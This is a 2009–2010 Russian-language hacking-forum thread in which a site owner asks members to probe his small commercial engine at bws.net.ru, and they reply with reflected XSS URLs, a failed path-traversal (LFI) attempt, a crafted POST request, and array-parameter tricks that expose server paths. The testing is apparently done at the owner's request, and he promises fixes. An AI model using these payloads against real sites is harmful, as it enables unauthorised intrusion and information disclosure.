Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
03.07.2009, 15:40
|
|
Новичок
Регистрация: 16.06.2009
Сообщений: 25
Провел на форуме:
26624
Репутация:
1
|
|
bws.net.ru
Разработал специальный мини движок для мини комерческих сайтов алянса с единой базой пользователей и платёжной системой на всех сайтах.
нужно проверить на уязвимости
|
|
|
04.07.2009, 10:59
|
|
Познающий
Регистрация: 27.03.2009
Сообщений: 40
Провел на форуме:
1191962
Репутация:
39
|
|
http://bws.net.ru/?nvg=office::services"><script>alert()</script>
http://bws.net.ru/?nvg=invest:service"><script>alert()</script>
http://bws.net.ru/?nvg=crline:application"><script>alert()</script>
Последний раз редактировалось Adm1n4eG; 04.07.2009 в 11:33..
|
|
|
|
05.07.2009, 21:21
|
|
Новичок
Регистрация: 16.06.2009
Сообщений: 25
Провел на форуме:
26624
Репутация:
1
|
|
спасибо, будет исправлено
|
|
|
|
06.07.2009, 06:30
|
|
Постоянный
Регистрация: 28.12.2007
Сообщений: 804
Провел на форуме:
4861890
Репутация:
1400
|
|
PHP код:
http://www.bws.net.ru/?nvg=office:payment"><script>alert()</script>
их тут куча) + смотри
PHP код:
http://www.bws.net.ru/?nvg="><script>alert()</script>
админка вылазиет))) с какого боку?)) |
|
|
|
06.07.2009, 08:51
|
|
Новичок
Регистрация: 16.06.2009
Сообщений: 25
Провел на форуме:
26624
Репутация:
1
|
|
их там не куча, а просто навигация одним файлом управляется, в нём подправить и всё
ЗЫ. ща исправлю, вчера на дачу ездил устал..
|
|
|
|
31.12.2009, 17:40
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
http://bws.net.ru/?com=../../../../../../../../../../../../../subscription../../../../../home/decide/domains/bws.net.ru/public_html/index
Я ваще не понял, что у тя там за проверка. Факт в том, что LFI не удался. Скажи, что за проверка, че за нах о_0 :-d
|
|
|
|
31.12.2009, 17:45
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
PHP код:
POST http://bws.net.ru/?com=subscription&cmd=add HTTP/1.0
Host: bws.net.ru
UserAgent: Opera/9.60 (Windows NT 5.1; U; en) Presto/2.1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-length: 17
eml[1]=loc@root.com
результат:
Warning: preg_match() expects parameter 2 to be string, array given in [path] |
|
|
|
31.12.2009, 19:34
|
|
Banned
Регистрация: 26.12.2009
Сообщений: 152
Провел на форуме:
86338
Репутация:
0
|
|
вроде все теперь крикрыл, норм теперь...
но это конешно жеть было...
http://www.bws.net.ru/?nvg="><script>alert()</script>
|
|
|
|
01.01.2010, 05:41
|
|
Познающий
Регистрация: 04.08.2008
Сообщений: 78
Провел на форуме:
355598
Репутация:
7
|
|
http://bws.net.ru/?com=%3C раскрытие путей
|
|
|
|
05.01.2010, 16:01
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
PHP код:
<select name="nskn[]" onchange=document.getElementById('fskn').submit()><option value="original" selected>original</select>
Пути
PHP код:
http://bws.net.ru/?nvg[]=invest
В меню вход в админку
PHP код:
http://bws.net.ru/?com[]=subscription
Пути
Последний раз редактировалось Byrger; 05.01.2010 в 16:04..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид